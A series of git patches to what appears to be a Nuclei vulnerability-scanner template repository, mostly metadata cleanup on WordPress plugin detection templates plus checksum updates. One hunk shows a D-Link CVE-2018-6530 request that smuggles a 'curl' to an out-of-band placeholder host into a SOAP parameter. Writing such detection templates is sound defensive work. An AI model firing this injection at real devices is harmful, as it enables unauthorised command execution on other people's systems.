@@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: - max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 4d6dd14d25..784ba22c8a 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: - max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 7ca0870ed6..72ff55e58a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: - max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 4f0d9be568..8cfaa0f5a9 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: - max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index f3c481b824..85900a01a7 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: - max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index ba214fd7ea..a7ccde0b49 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: - max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 8f5fe8d9a5..422664a98c 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: - max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 0458b13354..f0af3a748a 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: - max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index d570be07bf..f89f1a20b3 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: - max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index ee05e3add8..01fb12d0ad 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: - max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index df2487955f..1773857e15 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: - max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 79ff01211c..bcd1509c68 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: - max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 23414b3d1d..c6aca20a60 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: - max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 0178c8e9fb..810fc82cde 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: - max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a04ddc6003..783d381ed8 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: - max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 2ead906817..8bdc600063 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: - max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index dedd2e23b6..ab61cc0338 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: - max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 03cd7137a8..5f6fbc1f75 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: - max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index a68d4b7d78..d67150d038 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: - max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index bf9dfc3ad8..beeba7ca69 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: - max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 47911a86a5..c225df7bfd 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: - max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 1c25b6f488..aaad04cb76 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: - max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index b36317acd8..ff750a7d2a 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: - max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 5eb35dd17e..f1e7595ccd 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: - max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index ceb2b8d600..4b2769ee46 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: - max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From c8d7286f77098f538aae5c3d908ede85801dba2d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 8 Jul 2023 11:52:35 +0530 Subject: [PATCH 522/609] Updated protocol syntax --- http/cves/2018/CVE-2018-6530.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2018/CVE-2018-6530.yaml b/http/cves/2018/CVE-2018-6530.yaml index f484e4fc6e..33e0410865 100644 --- a/http/cves/2018/CVE-2018-6530.yaml +++ b/http/cves/2018/CVE-2018-6530.yaml @@ -19,7 +19,7 @@ info: max-request: 1 tags: cve,cve2018,d-link,rce,oast,unauth -requests: +http: - raw: - | POST /soap.cgi?service=whatever-control;curl {{interactsh-url}};whatever-invalid-shell HTTP/1.1 From cd1b7781dbf2fc0a41e52af0a7b734d37f8e07c0 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 8 Jul 2023 11:53:21 +0530 Subject: [PATCH 523/609] Update CVE-2023-36346.yaml --- http/cves/2023/CVE-2023-36346.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-36346.yaml b/http/cves/2023/CVE-2023-36346.yaml index 13cf5d9f35..9f44e65968 100644 --- a/http/cves/2023/CVE-2023-36346.yaml +++ b/http/cves/2023/CVE-2023-36346.yaml @@ -20,7 +20,7 @@ info: verified: "true" tags: cve,cve2023,xss,pos,codekop,unauth -requests: +http: - method: GET path: - "{{BaseURL}}/print.php?nm_member=" From 18f1702db09aaf54d8e1da50e8c430937dab5856 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 8 Jul 2023 11:55:13 +0530 Subject: [PATCH 524/609] Rename sitemap-sql-injection.yaml to sitemap-sql-injection.yaml --- .../other/sitemap-sql-injection.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename http/{vulnerabilities => vulnerabilities}/other/sitemap-sql-injection.yaml (100%) diff --git a/http/vulnerabilities /other/sitemap-sql-injection.yaml b/http/vulnerabilities/other/sitemap-sql-injection.yaml similarity index 100% rename from http/vulnerabilities /other/sitemap-sql-injection.yaml rename to http/vulnerabilities/other/sitemap-sql-injection.yaml From 50b0c162fecccbd4a54d9959274eb8cf6846df91 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 8 Jul 2023 12:01:58 +0530 Subject: [PATCH 525/609] Update open-proxy-external.yaml --- http/misconfiguration/proxy/open-proxy-external.yaml | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/http/misconfiguration/proxy/open-proxy-external.yaml b/http/misconfiguration/proxy/open-proxy-external.yaml index cbb3c6b36b..c4bc00ed94 100644 --- a/http/misconfiguration/proxy/open-proxy-external.yaml +++ b/http/misconfiguration/proxy/open-proxy-external.yaml @@ -27,10 +27,19 @@ http: GET http://{{interactsh-url}} HTTP/1.1 Host: {{interactsh-url}} + - |+ + GET / HTTP/1.1 + Host: {{Hostname}} + unsafe: true + matchers-condition: and matchers: - type: dsl dsl: - contains(body_1, "www.iana.org") || contains(body_1, "Example Domain") - contains(header_2, "X-Interactsh-Version") condition: or + + - type: dsl + dsl: + - '!contains(body_3, "Example Domain")' From 79203dca0efa9c207b5db75ba71e87a19397a8bf Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 8 Jul 2023 12:13:35 +0530 Subject: [PATCH 526/609] Update CVE-2023-36346.yaml --- http/cves/2023/CVE-2023-36346.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-36346.yaml b/http/cves/2023/CVE-2023-36346.yaml index 9f44e65968..521cc46f67 100644 --- a/http/cves/2023/CVE-2023-36346.yaml +++ b/http/cves/2023/CVE-2023-36346.yaml @@ -31,6 +31,7 @@ http: part: body words: - "" + - "print" condition: and - type: word From 4c2b9ab57c17bc127f9bdaa5a92415d845fd03fa Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 8 Jul 2023 12:16:40 +0530 Subject: [PATCH 527/609] Update dell-idrac.yaml --- http/exposed-panels/dell-idrac.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposed-panels/dell-idrac.yaml b/http/exposed-panels/dell-idrac.yaml index 05ec8a2bd4..15fb1b5481 100644 --- a/http/exposed-panels/dell-idrac.yaml +++ b/http/exposed-panels/dell-idrac.yaml @@ -21,6 +21,7 @@ http: - '{{BaseURL}}/login.html' stop-at-first-match: true + matchers-condition: and matchers: - type: word part: body From b5b6ce40ecfec5c5c010297243430d0e1f1a998a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 8 Jul 2023 06:49:37 +0000 Subject: [PATCH 528/609] Auto Generated New Template Addition List [Sat Jul 8 06:49:37 UTC 2023] :robot: --- .new-additions | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.new-additions b/.new-additions index faa88a2582..c6faf2507f 100644 --- a/.new-additions +++ b/.new-additions @@ -81,7 +81,7 @@ http/exposures/tokens/asana/asana-client-secret.yaml http/exposures/tokens/atlassian-token.yaml http/misconfiguration/proxy/open-proxy-external.yaml http/misconfiguration/unauth-temporal-web-ui.yaml -http/vulnerabilities /other/sitemap-sql-injection.yaml +http/vulnerabilities/other/sitemap-sql-injection.yaml http/vulnerabilities/wordpress/contus-video-gallery-sqli.yaml http/vulnerabilities/wordpress/leaguemanager-sql-injection.yaml http/vulnerabilities/wordpress/notificationx-sqli.yaml From 3c374a821a452db09314ba6052c9b59f01774d95 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 8 Jul 2023 06:50:02 +0000 Subject: [PATCH 529/609] Auto Generated Templates Checksum [Sat Jul 8 06:50:02 UTC 2023] :robot: --- templates-checksum.txt | 418 ++++++++++++++++++++--------------------- 1 file changed, 209 insertions(+), 209 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 96c50951a8..68ad8891a1 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -218,7 +218,7 @@ helpers/wordpress/plugins/broken-link-checker.txt:595d550379b2cb8bccb9659627308f helpers/wordpress/plugins/child-theme-configurator.txt:8e805063c85859847271163a1c51e5865e460aea helpers/wordpress/plugins/classic-editor.txt:933c3d96b7fbc319e2e08dda5c340797d7c8d99f helpers/wordpress/plugins/classic-widgets.txt:98250286db92ccc336dc6f622c10c8bc09286693 -helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt:2f42d9eff165ff903900a0f16da2e2d14bf3c5d9 +helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt:96ee9b81f665f617b051c02cea0aedf30d2f6dbf helpers/wordpress/plugins/cloudflare.txt:90e21e6589c03430b25fc4c525c14a0d6aff8619 helpers/wordpress/plugins/cmb2.txt:12291cb9150686dd1175c2a1662b9d1acd8b9b62 helpers/wordpress/plugins/coblocks.txt:513cc2cbdbaafc4b88110a8732fa6d6886d54ff5 @@ -268,7 +268,7 @@ helpers/wordpress/plugins/google-listings-and-ads.txt:6b67ce6c1930ff8e1d5003aeb8 helpers/wordpress/plugins/google-site-kit.txt:744f0f894a0a521da213db9761fe60af501463a6 helpers/wordpress/plugins/google-sitemap-generator.txt:9a1ae806a7c678b6c9b4895b016033f980c1bf10 helpers/wordpress/plugins/gtranslate.txt:02aeb4dd00e9c0bb1104a19a9856dc679709da62 -helpers/wordpress/plugins/gutenberg.txt:b884d07998819e6e3a34cadc04acc8c6be06d9aa +helpers/wordpress/plugins/gutenberg.txt:dea7d4e5843f834b287f2202e55ed9076a89450b helpers/wordpress/plugins/happy-elementor-addons.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/header-and-footer-scripts.txt:bf64dd8c92190417a38d834b0c92eee4be757761 helpers/wordpress/plugins/header-footer-code-manager.txt:c2e02b33da3f80da726e9cf198552626bb5042e8 @@ -400,7 +400,7 @@ helpers/wordpress/plugins/wpforms-lite.txt:868b573d10d425a212e9438804c270d24af5d helpers/wordpress/plugins/wps-hide-login.txt:fa12796bd5aa83d02e53616812c25306cd1d6917 helpers/wordpress/plugins/wpvivid-backuprestore.txt:83a35ac526394e5168b118d107d874266be82e5e helpers/wordpress/plugins/yith-woocommerce-compare.txt:fc4929308af8b80845b3c743a30013a669a02875 -helpers/wordpress/plugins/yith-woocommerce-wishlist.txt:c1561cd7b973a41baaf95516c020fd65e8656f28 +helpers/wordpress/plugins/yith-woocommerce-wishlist.txt:c61914eedd18bbc5cef63dd9c18a3a57d3d39671 http/cnvd/2017/CNVD-2017-03561.yaml:74103420668209b795d1397008e67affd3e0856c http/cnvd/2018/CNVD-2018-13393.yaml:b936c60ce1fa7cd38b10597e9038dcb05692bf7c http/cnvd/2019/CNVD-2019-01348.yaml:4bef313f2d9d68a895af773006cc2fe7de376b7b @@ -1010,7 +1010,7 @@ http/cves/2018/CVE-2018-5715.yaml:95475d058485d10f885f4697fba1287e693803f4 http/cves/2018/CVE-2018-6008.yaml:f4e343e6de058a0c15c71ccb05c7895cc942de42 http/cves/2018/CVE-2018-6184.yaml:86a6d8e36284a2877e0daa70fb12ce513db32641 http/cves/2018/CVE-2018-6200.yaml:b6602fc6b88afc75d79933fa1e6d569868e3c385 -http/cves/2018/CVE-2018-6530.yaml:6e7e80783d4ea1cbc800478c36a743452b99ab21 +http/cves/2018/CVE-2018-6530.yaml:02363de1d527288e2a62b842fe291dc677c8cc85 http/cves/2018/CVE-2018-6910.yaml:6fb429bd79763bf947211e9b3ab4c279c1a20ce8 http/cves/2018/CVE-2018-7251.yaml:508aa86455e7988ae7168d677be715b0c88d32ed http/cves/2018/CVE-2018-7422.yaml:b00f1e2d8da984addda984d60a640ed932114a57 @@ -2360,7 +2360,7 @@ http/cves/2023/CVE-2023-35843.yaml:c6427155bef898736ce1c5524f31e6a093c8b861 http/cves/2023/CVE-2023-35844.yaml:6d63343cd1d397fc2169be8459ea294c22008817 http/cves/2023/CVE-2023-36287.yaml:5eb1daacf8748242791657809bb6e463b71a48f6 http/cves/2023/CVE-2023-36289.yaml:71857d7c8d924ea71d0cea573f83c4879f951555 -http/cves/2023/CVE-2023-36346.yaml:fd61197145eaee3393cfa6b0eabdda31eb9ea6ef +http/cves/2023/CVE-2023-36346.yaml:9ee6abfd347367ffb335b101ce3c283a34d6ec3c http/default-logins/3com/3com-nj2000-default-login.yaml:c00b706cfbbb60a4377ed00240d60f1b4679f18d http/default-logins/UCMDB/ucmdb-default-login.yaml:65a8ff54c063a35e251409ed8bfd1a93e50d42c2 http/default-logins/abb/cs141-default-login.yaml:8914cccfee6dfcbfbb632cf088ca7a33823561d6 @@ -2690,7 +2690,7 @@ http/exposed-panels/dataiku-panel.yaml:ba64117fa67cf9a5855679e5197f576902d913de http/exposed-panels/davantis-panel.yaml:c03b26bb73911e2dbdf694aca3b2eeee5c0f1b34 http/exposed-panels/daybyday-panel.yaml:8ed488191a395ea801b2056dceb3f47a7ce0ca2e http/exposed-panels/defectdojo-panel.yaml:9e0765aa7e93715b22934b41166dcdee56bc268c -http/exposed-panels/dell-idrac.yaml:5c2bf1e55a058ebc72c278b745dec7f32a2e1c52 +http/exposed-panels/dell-idrac.yaml:3eb7b3688a666759caa5cf41f9c5b00641edc2aa http/exposed-panels/dell-openmanager-login.yaml:bcb7251f61c2a48417744d2bea1b0edf50799c50 http/exposed-panels/dell-wyse-login.yaml:1fe2d5e4ecba5082a77937e036c1ea2657596687 http/exposed-panels/delta-login-panel.yaml:1df6aaa165467783b6577707c3d70d20001570c5 @@ -4229,7 +4229,7 @@ http/misconfiguration/proxy/metadata-google.yaml:1af1293a92a2a863c8e559340dc4c18 http/misconfiguration/proxy/metadata-hetzner.yaml:dd8f9a2d9450f969568011d5464f68657bb0bceb http/misconfiguration/proxy/metadata-openstack.yaml:d108d421eba03be5e1dc95e3f2925a0d514d3a2d http/misconfiguration/proxy/metadata-oracle.yaml:74e6d921d81b38db938225ca24f104a48fceeee2 -http/misconfiguration/proxy/open-proxy-external.yaml:e8bd0621346886e2ddd41ca310c609052053cb13 +http/misconfiguration/proxy/open-proxy-external.yaml:ce529af151621630c885b51cf7a07bb1e149518b http/misconfiguration/proxy/open-proxy-internal.yaml:4fdc217e331de9cc7cd2479953d1f38113eae123 http/misconfiguration/proxy/open-proxy-localhost.yaml:3e9ac6a8f82562a031e5c6e127501756cf7e92b4 http/misconfiguration/proxy/open-proxy-portscan.yaml:3200511b91414463b697697946b3379748bcd268 @@ -5411,214 +5411,214 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 -http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd -http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 +http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed +http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724 -http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e -http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4 -http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f -http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07 -http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1 -http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c -http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff -http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a -http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c -http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d -http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a -http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae -http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299 -http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9 -http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369 -http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844 -http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c -http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636 -http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e -http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a 